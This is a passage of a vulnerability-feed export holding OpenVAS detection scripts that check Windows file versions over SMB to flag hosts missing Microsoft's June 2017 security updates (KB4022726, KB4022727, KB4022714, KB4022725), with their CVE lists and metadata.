Vulnerabilities (KB4022726)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811154\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\",\n \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8460\", \"CVE-2017-8493\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\",\n \"CVE-2017-8522\", \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\",\n \"CVE-2017-8468\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98922, 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826,\n 98932, 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864,\n 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98887, 98850,\n 98900, 98818, 98842, 98848, 98849, 98899, 98926, 98930, 98843,\n 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:08:00 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022726)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022726\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in importing printer drivers and get errors with error code\n 0x80070bcb.\n\n - The mouse input can cease to function. The mouse pointer may continue\n to move, but movements and clicks produce no response other than a\n beeping noise.\n\n - An error in printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - An error in unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Multiple issue in Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to gain\n the same user rights as the current user and to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022726\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.9600.18722\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.9600.18722\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022727", "modified": "2020-06-04T00:00:00", "published": "2017-06-15T00:00:00", "id": "OPENVAS:1361412562310811196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811196", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022727)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022727)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811196\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\",\n \"CVE-2017-8547\", \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8492\", \"CVE-2017-8493\",\n \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\", \"CVE-2017-8524\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98897, 98898, 98885, 98853, 98903,\n 98953, 98863, 98819, 98920, 98918, 98854, 98845, 98820, 98914,\n 98856, 98857, 98821, 98824, 98922, 98923, 98862, 98858, 98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022725", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 98854, 98845, 98819, 98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 